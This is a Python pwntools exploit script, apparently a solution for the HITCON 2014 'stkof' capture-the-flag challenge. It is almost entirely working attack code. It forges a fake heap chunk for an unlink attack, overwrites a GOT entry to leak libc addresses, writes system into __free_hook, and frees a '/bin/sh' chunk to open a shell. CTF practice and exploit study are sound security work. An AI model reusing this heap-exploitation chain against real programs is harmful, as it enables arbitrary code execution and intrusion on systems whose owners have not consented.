hitcon 2014 stkof

from pwn import *
 
p = process("./stkof")
elf = ELF("./stkof")
 
def malloc(size):
    p.sendline("1")
    p.sendline(str(size))
    print p.recvuntil('OK')
 
def free(index):
    p.sendline("3")
    p.sendline(str(index))
    print p.recvuntil('OK')
 
def fread(index,length,data):
    p.sendline("2")
    p.sendline(str(index))
    p.sendline(str(length))
    p.sendline(data)
    print p.recvuntil('OK')
 
def len_check(index):
    p.sendline("4")
    p.sendline(str(index))
    p.recv(1024) #enter input 
 
pointer = 0x602150
 
malloc(0x80)
malloc(0x80)
malloc(0x80)
malloc(0x80)
malloc(0x80)
 
payload = p64(0)
payload += p64(0x81)
payload += p64(pointer-0x18)
payload += p64(pointer-0x10)
payload += "A"*0x60
 
payload += p64(0x80)
payload += p64(0x90)
 
fread(2,len(payload),payload)
free(3)
payload = p64(0)*2
payload += p64(elf.got['strlen'])
fread(2,len(payload),payload)
fread(1,8,p64(elf.plt['puts']))
 
malloc(0x100)
malloc(0x100)
free(6)
malloc(0x99)
len_check(8)
main_arena = u64(p.recv(6)+"\x00\x00") - 344
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - 0x3c4b10
system = libc_base + 0x45390
free_hook = libc_base + 0x3c67a8
print hex(malloc_hook)
print hex(libc_base)
print hex(system)
 
payload = p64(0)*2
payload += p64(free_hook)
fread(2,len(payload),payload)
 
fread(1,8,p64(system))
 
malloc(0x105)
BinSH = "/bin/sh\x00"
fread(9,len(BinSH)+1,BinSH)
 
free(9)
 
p.interactive()

UNLINK GGUL JAM